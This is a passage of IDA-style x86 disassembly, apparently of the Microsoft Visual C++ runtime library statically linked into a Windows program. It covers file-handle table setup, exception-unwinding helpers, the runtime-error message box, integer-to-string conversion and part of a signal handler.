mov dword_492420[eax*4], ecx
mov edx, dword_492520
add edx, 20h
mov dword_492520, edx
jmp short loc_425C15
; ---------------------------------------------------------------------------
loc_425C0C: ; CODE XREF: sub_425AC0+18B�j
mov eax, [ebp+var_50]
add eax, 24h
mov [ebp+var_50], eax
loc_425C15: ; CODE XREF: sub_425AC0+14A�j
mov ecx, [ebp+var_5C]
mov edx, dword_492420[ecx*4]
add edx, 480h
cmp [ebp+var_50], edx
jnb short loc_425C4D
mov eax, [ebp+var_50]
mov byte ptr [eax+4], 0
mov ecx, [ebp+var_50]
mov dword ptr [ecx], 0FFFFFFFFh
mov edx, [ebp+var_50]
mov byte ptr [edx+5], 0Ah
mov eax, [ebp+var_50]
mov dword ptr [eax+8], 0
jmp short loc_425C0C
; ---------------------------------------------------------------------------
loc_425C4D: ; CODE XREF: sub_425AC0+168�j
jmp loc_425BA9
; ---------------------------------------------------------------------------
loc_425C52: ; CODE XREF: sub_425AC0+FB�j
; sub_425AC0+12C�j
mov [ebp+var_58], 0
jmp short loc_425C76
; ---------------------------------------------------------------------------
loc_425C5B: ; CODE XREF: sub_425AC0:loc_425CE0�j
mov ecx, [ebp+var_58]
add ecx, 1
mov [ebp+var_58], ecx
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_60]
add eax, 4
mov [ebp+var_60], eax
loc_425C76: ; CODE XREF: sub_425AC0+199�j
mov ecx, [ebp+var_58]
cmp ecx, [ebp+var_64]
jge short loc_425CE5
mov edx, [ebp+var_60]
cmp dword ptr [edx], 0FFFFFFFFh
jz short loc_425CE0
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
and ecx, 1
test ecx, ecx
jz short loc_425CE0
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
and eax, 8
test eax, eax
jnz short loc_425CB0
mov ecx, [ebp+var_60]
mov edx, [ecx]
push edx
call ds:dword_4942CC
test eax, eax
jz short loc_425CE0
loc_425CB0: ; CODE XREF: sub_425AC0+1DE�j
mov eax, [ebp+var_58]
sar eax, 5
mov ecx, [ebp+var_58]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
add edx, ecx
mov [ebp+var_50], edx
mov eax, [ebp+var_50]
mov ecx, [ebp+var_60]
mov edx, [ecx]
mov [eax], edx
mov eax, [ebp+var_50]
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov [eax+4], dl
loc_425CE0: ; CODE XREF: sub_425AC0+1C4�j
; sub_425AC0+1D1�j ...
jmp loc_425C5B
; ---------------------------------------------------------------------------
loc_425CE5: ; CODE XREF: sub_425AC0+98�j
; sub_425AC0+A2�j ...
mov [ebp+var_58], 0
jmp short loc_425CF7
; ---------------------------------------------------------------------------
loc_425CEE: ; CODE XREF: sub_425AC0:loc_425DCF�j
mov eax, [ebp+var_58]
add eax, 1
mov [ebp+var_58], eax
loc_425CF7: ; CODE XREF: sub_425AC0+22C�j
cmp [ebp+var_58], 3
jge loc_425DD4
mov ecx, [ebp+var_58]
imul ecx, 24h
mov edx, dword_492420
add edx, ecx
mov [ebp+var_50], edx
mov eax, [ebp+var_50]
cmp dword ptr [eax], 0FFFFFFFFh
jnz loc_425DC0
mov ecx, [ebp+var_50]
mov byte ptr [ecx+4], 81h
cmp [ebp+var_58], 0
jnz short loc_425D34
mov [ebp+var_6C], 0FFFFFFF6h
jmp short loc_425D44
; ---------------------------------------------------------------------------
loc_425D34: ; CODE XREF: sub_425AC0+269�j
mov edx, [ebp+var_58]
sub edx, 1
neg edx
sbb edx, edx
add edx, 0FFFFFFF5h
mov [ebp+var_6C], edx
loc_425D44: ; CODE XREF: sub_425AC0+272�j
mov eax, [ebp+var_6C]
push eax
call ds:dword_49443C
mov [ebp+var_4C], eax
cmp [ebp+var_4C], 0FFFFFFFFh
jz short loc_425DAF
mov ecx, [ebp+var_4C]
push ecx
call ds:dword_4942CC
mov [ebp+var_54], eax
cmp [ebp+var_54], 0
jz short loc_425DAF
mov edx, [ebp+var_50]
mov eax, [ebp+var_4C]
mov [edx], eax
mov ecx, [ebp+var_54]
and ecx, 0FFh
cmp ecx, 2
jnz short loc_425D90
mov edx, [ebp+var_50]
mov al, [edx+4]
or al, 40h
mov ecx, [ebp+var_50]
mov [ecx+4], al
jmp short loc_425DAD
; ---------------------------------------------------------------------------
loc_425D90: ; CODE XREF: sub_425AC0+2BE�j
mov edx, [ebp+var_54]
and edx, 0FFh
cmp edx, 3
jnz short loc_425DAD
mov eax, [ebp+var_50]
mov cl, [eax+4]
or cl, 8
mov edx, [ebp+var_50]
mov [edx+4], cl
loc_425DAD: ; CODE XREF: sub_425AC0+2CE�j
; sub_425AC0+2DC�j
jmp short loc_425DBE
; ---------------------------------------------------------------------------
loc_425DAF: ; CODE XREF: sub_425AC0+295�j
; sub_425AC0+2A8�j
mov eax, [ebp+var_50]
mov cl, [eax+4]
or cl, 40h
mov edx, [ebp+var_50]
mov [edx+4], cl
loc_425DBE: ; CODE XREF: sub_425AC0:loc_425DAD�j
jmp short loc_425DCF
; ---------------------------------------------------------------------------
loc_425DC0: ; CODE XREF: sub_425AC0+258�j
mov eax, [ebp+var_50]
mov cl, [eax+4]
or cl, 80h
mov edx, [ebp+var_50]
mov [edx+4], cl
loc_425DCF: ; CODE XREF: sub_425AC0:loc_425DBE�j
jmp loc_425CEE
; ---------------------------------------------------------------------------
loc_425DD4: ; CODE XREF: sub_425AC0+23B�j
mov eax, dword_492520
push eax
call ds:dword_4942D0
mov esp, ebp
pop ebp
retn
sub_425AC0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 8
mov dword ptr [ebp-8], 0
jmp short loc_425E08
; ---------------------------------------------------------------------------
loc_425DFF: ; CODE XREF: .text:loc_425E82�j
mov eax, [ebp-8]
add eax, 1
mov [ebp-8], eax
loc_425E08: ; CODE XREF: .text:00425DFD�j
cmp dword ptr [ebp-8], 40h
jge short loc_425E87
mov ecx, [ebp-8]
cmp dword_492420[ecx*4], 0
jz short loc_425E82
mov edx, [ebp-8]
mov eax, dword_492420[edx*4]
mov [ebp-4], eax
jmp short loc_425E33
; ---------------------------------------------------------------------------
loc_425E2A: ; CODE XREF: .text:loc_425E5D�j
mov ecx, [ebp-4]
add ecx, 24h
mov [ebp-4], ecx
loc_425E33: ; CODE XREF: .text:00425E28�j
mov edx, [ebp-8]
mov eax, dword_492420[edx*4]
add eax, 480h
cmp [ebp-4], eax
jnb short loc_425E5F
mov ecx, [ebp-4]
cmp dword ptr [ecx+8], 0
jz short loc_425E5D
mov edx, [ebp-4]
add edx, 0Ch
push edx
call ds:dword_494310
loc_425E5D: ; CODE XREF: .text:00425E4E�j
jmp short loc_425E2A
; ---------------------------------------------------------------------------
loc_425E5F: ; CODE XREF: .text:00425E45�j
push 2
mov eax, [ebp-8]
mov ecx, dword_492420[eax*4]
push ecx
call sub_4174C0
add esp, 8
mov edx, [ebp-8]
mov dword_492420[edx*4], 0
loc_425E82: ; CODE XREF: .text:00425E19�j
jmp loc_425DFF
; ---------------------------------------------------------------------------
loc_425E87: ; CODE XREF: .text:00425E0C�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425E8C proc near ; CODE XREF: sub_425F84+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_425EA4
push [ebp+arg_0]
call sub_430F9E
loc_425EA4: ; DATA XREF: sub_425E8C+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_425E8C endp
; =============== S U B R O U T I N E =======================================
sub_425EAC proc near ; DATA XREF: sub_425ECE+A�o
; .text:00425F3F�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_425ECD
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_425ECD: ; CODE XREF: sub_425EAC+10�j
retn
sub_425EAC endp
; =============== S U B R O U T I N E =======================================
sub_425ECE proc near ; CODE XREF: sub_425F84+67�p
; sub_425F84+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_425EAC
push large dword ptr fs:0
mov large fs:0, esp
loc_425EEB: ; CODE XREF: sub_425ECE:loc_425F26�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_425F28
cmp esi, [esp+1Ch+arg_4]
jz short loc_425F28
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_425F26
push 101h
mov eax, [ebx+esi*4+8]
call sub_425F62
call dword ptr [ebx+esi*4+8]
loc_425F26: ; CODE XREF: sub_425ECE+44�j
jmp short loc_425EEB
; ---------------------------------------------------------------------------
loc_425F28: ; CODE XREF: sub_425ECE+2A�j
; sub_425ECE+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_425ECE endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_425EAC
jnz short locret_425F58
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_425F58
mov eax, 1
locret_425F58: ; CODE XREF: .text:00425F46�j
; .text:00425F51�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_44367C
jmp short loc_425F6C
; =============== S U B R O U T I N E =======================================
sub_425F62 proc near ; CODE XREF: sub_425ECE+4F�p
; sub_425F84+78�p
push ebx
push ecx
mov ebx, offset dword_44367C
mov ecx, [ebp+8]
loc_425F6C: ; CODE XREF: .text:00425F60�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_425F62 endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425F84 proc near ; DATA XREF: sub_41B970+A�o
; sub_422F40+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_426024
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_425FB7: ; CODE XREF: sub_425F84+90�j
cmp esi, 0FFFFFFFFh
jz short loc_42601D
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_42600B
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_42600B
js short loc_426016
mov edi, [ebx+8]
push ebx
call sub_425E8C
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_425ECE
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_425F62
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_42600B: ; CODE XREF: sub_425F84+40�j
; sub_425F84+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_425FB7
; ---------------------------------------------------------------------------
loc_426016: ; CODE XREF: sub_425F84+54�j
mov eax, 0
jmp short loc_426039
; ---------------------------------------------------------------------------
loc_42601D: ; CODE XREF: sub_425F84+36�j
mov eax, 1
jmp short loc_426039
; ---------------------------------------------------------------------------
loc_426024: ; CODE XREF: sub_425F84+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_425ECE
add esp, 8
pop ebp
mov eax, 1
loc_426039: ; CODE XREF: sub_425F84+97�j
; sub_425F84+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_425F84 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_425ECE
add esp, 8
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426060 proc near ; CODE XREF: sub_41BAE0+C�p
; sub_41BB10+C�p
push ebp
mov ebp, esp
cmp dword_4920E0, 1
jz short loc_42607E
cmp dword_4920E0, 0
jnz short loc_4260A7
cmp dword_442C54, 1
jnz short loc_4260A7
loc_42607E: ; CODE XREF: sub_426060+A�j
push 0FCh
call sub_4260B0
add esp, 4
cmp dword_49229C, 0
jz short loc_42609A
call dword_49229C
loc_42609A: ; CODE XREF: sub_426060+32�j
push 0FFh
call sub_4260B0
add esp, 4
loc_4260A7: ; CODE XREF: sub_426060+13�j
; sub_426060+1C�j
pop ebp
retn
sub_426060 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4260B0 proc near ; CODE XREF: sub_41BAE0+15�p
; sub_41BB10+15�p ...
var_1B0 = byte ptr -1B0h
var_110 = byte ptr -110h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push ebx
push esi
push edi
mov [ebp+var_8], 0
jmp short loc_4260CE
; ---------------------------------------------------------------------------
loc_4260C5: ; CODE XREF: sub_4260B0:loc_4260E5�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_4260CE: ; CODE XREF: sub_4260B0+13�j
cmp [ebp+var_8], 12h
jnb short loc_4260E7
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_0]
cmp edx, dword_443690[ecx*8]
jnz short loc_4260E5
jmp short loc_4260E7
; ---------------------------------------------------------------------------
loc_4260E5: ; CODE XREF: sub_4260B0+31�j
jmp short loc_4260C5
; ---------------------------------------------------------------------------
loc_4260E7: ; CODE XREF: sub_4260B0+22�j
; sub_4260B0+33�j
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
cmp ecx, dword_443690[eax*8]
jnz loc_426268
cmp [ebp+arg_0], 0FCh
jz short loc_426124
mov edx, [ebp+var_8]
mov eax, off_443694[edx*8]
push eax
push 0
push 0
push 0
push 1
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_426124
int 3 ; Trap to Debugger
loc_426124: ; CODE XREF: sub_4260B0+51�j
; sub_4260B0+71�j
cmp dword_4920E0, 1
jz short loc_42613F
cmp dword_4920E0, 0
jnz short loc_426178
cmp dword_442C54, 1
jnz short loc_426178
loc_42613F: ; CODE XREF: sub_4260B0+7B�j
push 0
lea ecx, [ebp+var_4]
push ecx
mov edx, [ebp+var_8]
mov eax, off_443694[edx*8]
push eax
call sub_418E70
add esp, 4
push eax
mov ecx, [ebp+var_8]
mov edx, off_443694[ecx*8]
push edx
push 0FFFFFFF4h
call ds:dword_49443C
push eax
call ds:dword_4942E4
jmp loc_426268
; ---------------------------------------------------------------------------
loc_426178: ; CODE XREF: sub_4260B0+84�j
; sub_4260B0+8D�j
cmp [ebp+arg_0], 0FCh
jz loc_426268
push 104h
lea eax, [ebp+var_110]
push eax
push 0
call ds:dword_4942F8
test eax, eax
jnz short loc_4261B1
push offset aProgramNameUnk ; "<program name unknown>"
lea ecx, [ebp+var_110]
push ecx
call sub_419FA0
add esp, 8
loc_4261B1: ; CODE XREF: sub_4260B0+EB�j
lea edx, [ebp+var_110]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
push eax
call sub_418E70
add esp, 4
add eax, 1
cmp eax, 3Ch
jbe short loc_4261FA
lea ecx, [ebp+var_110]
push ecx
call sub_418E70
add esp, 4
mov edx, [ebp+var_C]
lea eax, [edx+eax-3Bh]
mov [ebp+var_C], eax
push 3
push offset a___ ; "..."
mov ecx, [ebp+var_C]
push ecx
call sub_4191A0
add esp, 0Ch
loc_4261FA: ; CODE XREF: sub_4260B0+11C�j
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
lea edx, [ebp+var_1B0]
push edx
call sub_419FA0
add esp, 8
mov eax, [ebp+var_C]
push eax
lea ecx, [ebp+var_1B0]
push ecx
call sub_419FB0
add esp, 8
push offset asc_432DD0 ; "\n\n"
lea edx, [ebp+var_1B0]
push edx
call sub_419FB0
add esp, 8
mov eax, [ebp+var_8]
mov ecx, off_443694[eax*8]
push ecx
lea edx, [ebp+var_1B0]
push edx
call sub_419FB0
add esp, 8
push 12010h
push offset aMicrosoftVis_0 ; "Microsoft Visual C++ Runtime Library"
lea eax, [ebp+var_1B0]
push eax
call sub_426B40
add esp, 0Ch
loc_426268: ; CODE XREF: sub_4260B0+44�j
; sub_4260B0+C3�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4260B0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov dword ptr [ebp-4], 0
jmp short loc_426286
; ---------------------------------------------------------------------------
loc_42627D: ; CODE XREF: .text:loc_42629D�j
mov eax, [ebp-4]
add eax, 1
mov [ebp-4], eax
loc_426286: ; CODE XREF: .text:0042627B�j
cmp dword ptr [ebp-4], 12h
jnb short loc_42629F
mov ecx, [ebp-4]
mov edx, [ebp+8]
cmp edx, dword_443690[ecx*8]
jnz short loc_42629D
jmp short loc_42629F
; ---------------------------------------------------------------------------
loc_42629D: ; CODE XREF: .text:00426299�j
jmp short loc_42627D
; ---------------------------------------------------------------------------
loc_42629F: ; CODE XREF: .text:0042628A�j
; .text:0042629B�j
mov eax, [ebp-4]
mov ecx, [ebp+8]
cmp ecx, dword_443690[eax*8]
jnz short loc_4262BA
mov edx, [ebp-4]
mov eax, off_443694[edx*8]
jmp short loc_4262BC
; ---------------------------------------------------------------------------
loc_4262BA: ; CODE XREF: .text:004262AC�j
xor eax, eax
loc_4262BC: ; CODE XREF: .text:004262B8�j
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4262C0 proc near ; CODE XREF: sub_41BF80+31D�p
; sub_42ACC0+1EF�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0Ah
jnz short loc_4262E7
cmp [ebp+arg_0], 0
jge short loc_4262E7
push 1
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_426310
add esp, 10h
jmp short loc_4262FD
; ---------------------------------------------------------------------------
loc_4262E7: ; CODE XREF: sub_4262C0+7�j
; sub_4262C0+D�j
push 0
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_426310
add esp, 10h
loc_4262FD: ; CODE XREF: sub_4262C0+25�j
mov eax, [ebp+arg_4]
pop ebp
retn
sub_4262C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426310 proc near ; CODE XREF: sub_4262C0+1D�p
; sub_4262C0+35�p ...
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
cmp [ebp+arg_C], 0
jz short loc_426339
mov ecx, [ebp+var_4]
mov byte ptr [ecx], 2Dh
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+arg_0]
neg eax
mov [ebp+arg_0], eax
loc_426339: ; CODE XREF: sub_426310+10�j
mov ecx, [ebp+var_4]
mov [ebp+var_8], ecx
loc_42633F: ; CODE XREF: sub_426310+79�j
mov eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_8]
mov [ebp+var_C], edx
mov eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_8]
mov [ebp+arg_0], eax
cmp [ebp+var_C], 9
jbe short loc_426371
mov edx, [ebp+var_C]
add edx, 57h
mov eax, [ebp+var_4]
mov [eax], dl
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
jmp short loc_426385
; ---------------------------------------------------------------------------
loc_426371: ; CODE XREF: sub_426310+49�j
mov edx, [ebp+var_C]
add edx, 30h
mov eax, [ebp+var_4]
mov [eax], dl
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_426385: ; CODE XREF: sub_426310+5F�j
cmp [ebp+arg_0], 0
ja short loc_42633F
mov edx, [ebp+var_4]
mov byte ptr [edx], 0
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
loc_42639A: ; CODE XREF: sub_426310+BC�j
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov [ebp+var_10], dl
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+var_8]
mov cl, [ebp+var_10]
mov [eax], cl
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
cmp ecx, [ebp+var_4]
jb short loc_42639A
mov esp, ebp
pop ebp
retn
sub_426310 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword ptr [ebp+10h], 0Ah
jnz short loc_4263F9
cmp dword ptr [ebp+8], 0
jge short loc_4263F9
mov dword ptr [ebp-4], 1
jmp short loc_426400
; ---------------------------------------------------------------------------
loc_4263F9: ; CODE XREF: .text:004263E8�j
; .text:004263EE�j
mov dword ptr [ebp-4], 0
loc_426400: ; CODE XREF: .text:004263F7�j
mov eax, [ebp-4]
push eax
mov ecx, [ebp+10h]
push ecx
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
call sub_426310
add esp, 10h
mov eax, [ebp+0Ch]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0
mov eax, [ebp+10h]
push eax
mov ecx, [ebp+0Ch]
push ecx
mov edx, [ebp+8]
push edx
call sub_426310
add esp, 10h
mov eax, [ebp+0Ch]
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword ptr [ebp+14h], 0Ah
jnz short loc_426461
cmp dword ptr [ebp+0Ch], 0
jg short loc_426461
jl short loc_426458
cmp dword ptr [ebp+8], 0
jnb short loc_426461
loc_426458: ; CODE XREF: .text:00426450�j
mov dword ptr [ebp-4], 1
jmp short loc_426468
; ---------------------------------------------------------------------------
loc_426461: ; CODE XREF: .text:00426448�j
; .text:0042644E�j ...
mov dword ptr [ebp-4], 0
loc_426468: ; CODE XREF: .text:0042645F�j
mov eax, [ebp-4]
push eax
mov ecx, [ebp+14h]
push ecx
mov edx, [ebp+10h]
push edx
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
call sub_426490
mov eax, [ebp+10h]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426490 proc near ; CODE XREF: .text:0042647C�p
; .text:004265A5�p
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
cmp [ebp+arg_10], 0
jz short loc_4264C4
mov ecx, [ebp+var_4]
mov byte ptr [ecx], 2Dh
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+arg_0]
neg eax
mov ecx, [ebp+arg_4]
adc ecx, 0
neg ecx
mov [ebp+arg_0], eax
mov [ebp+arg_4], ecx
loc_4264C4: ; CODE XREF: sub_426490+10�j
mov edx, [ebp+var_4]
mov [ebp+var_8], edx
loc_4264CA: ; CODE XREF: sub_426490+9F�j
; sub_426490+A7�j
mov eax, [ebp+arg_C]
xor ecx, ecx
push ecx
push eax
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_41A4B0
mov [ebp+var_C], eax
mov ecx, [ebp+arg_C]
xor edx, edx
push edx
push ecx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41A440
mov [ebp+arg_0], eax
mov [ebp+arg_4], edx
cmp [ebp+var_C], 9
jbe short loc_426517
mov edx, [ebp+var_C]
add edx, 57h
mov eax, [ebp+var_4]
mov [eax], dl
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
jmp short loc_42652B
; ---------------------------------------------------------------------------
loc_426517: ; CODE XREF: sub_426490+6F�j
mov edx, [ebp+var_C]
add edx, 30h
mov eax, [ebp+var_4]
mov [eax], dl
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_42652B: ; CODE XREF: sub_426490+85�j
cmp [ebp+arg_4], 0
ja short loc_4264CA
jb short loc_426539
cmp [ebp+arg_0], 0
ja short loc_4264CA
loc_426539: ; CODE XREF: sub_426490+A1�j
mov edx, [ebp+var_4]
mov byte ptr [edx], 0
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
loc_426548: ; CODE XREF: sub_426490+EA�j
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov [ebp+var_10], dl
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+var_8]
mov cl, [ebp+var_10]
mov [eax], cl
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
cmp ecx, [ebp+var_4]
jb short loc_426548
mov esp, ebp
pop ebp
retn 14h
sub_426490 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0
mov eax, [ebp+14h]
push eax
mov ecx, [ebp+10h]
push ecx
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
call sub_426490
mov eax, [ebp+10h]
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 10h
push esi
cmp dword ptr [ebp+0Ch], 4
jz short loc_4265C3
cmp dword ptr [ebp+0Ch], 3
jnz short loc_4265C8
loc_4265C3: ; CODE XREF: .text:004265BB�j
jmp loc_426798
; ---------------------------------------------------------------------------
loc_4265C8: ; CODE XREF: .text:004265C1�j
cmp dword ptr [ebp+8], 2
jz short loc_4265E4
cmp dword ptr [ebp+8], 15h
jz short loc_4265E4
cmp dword ptr [ebp+8], 16h
jz short loc_4265E4
cmp dword ptr [ebp+8], 0Fh
jnz loc_4266C1
loc_4265E4: ; CODE XREF: .text:004265CC�j
; .text:004265D2�j ...
push 1
call sub_41BC90
add esp, 4
cmp dword ptr [ebp+8], 2
jz short loc_4265FA
cmp dword ptr [ebp+8], 15h
jnz short loc_42663F
loc_4265FA: ; CODE XREF: .text:004265F2�j
cmp dword_4922B0, 0
jnz short loc_42663F
push 1
push offset sub_4267E0
call ds:dword_4943EC
cmp eax, 1
jnz short loc_426621
mov dword_4922B0, 1
jmp short loc_42663F
; ---------------------------------------------------------------------------
loc_426621: ; CODE XREF: .text:00426613�j
call ds:dword_4942F0
mov esi, eax
call sub_422F30
mov [eax], esi
push 1
call sub_41BD30
add esp, 4
jmp loc_426798
; ---------------------------------------------------------------------------
loc_42663F: ; CODE XREF: .text:004265F8�j
; .text:00426601�j ...
mov eax, [ebp+8]
mov [ebp-10h], eax
mov ecx, [ebp-10h]
sub ecx, 2
mov [ebp-10h], ecx
cmp dword ptr [ebp-10h], 14h
ja short loc_4266B2
mov eax, [ebp-10h]
xor edx, edx
mov dl, ds:byte_4267BF[eax]
jmp ds:off_4267AB[edx*4]
loc_426666: ; DATA XREF: .text:off_4267AB�o
mov ecx, dword_4922A0
mov [ebp-0Ch], ecx
mov edx, [ebp+0Ch]
mov dword_4922A0, edx
jmp short loc_4266B2
; ---------------------------------------------------------------------------
loc_42667A: ; CODE XREF: .text:0042665F�j
; DATA XREF: .text:004267B3�o
mov eax, dword_4922A4
mov [ebp-0Ch], eax
mov ecx, [ebp+0Ch]
mov dword_4922A4, ecx
jmp short loc_4266B2
; ---------------------------------------------------------------------------
loc_42668D: ; CODE XREF: .text:0042665F�j
; DATA XREF: .text:004267B7�o
mov edx, dword_4922A8
mov [ebp-0Ch], edx
mov eax, [ebp+0Ch]
mov dword_4922A8, eax
jmp short loc_4266B2
; ---------------------------------------------------------------------------
loc_4266A0: ; CODE XREF: .text:0042665F�j
; DATA XREF: .text:004267AF�o
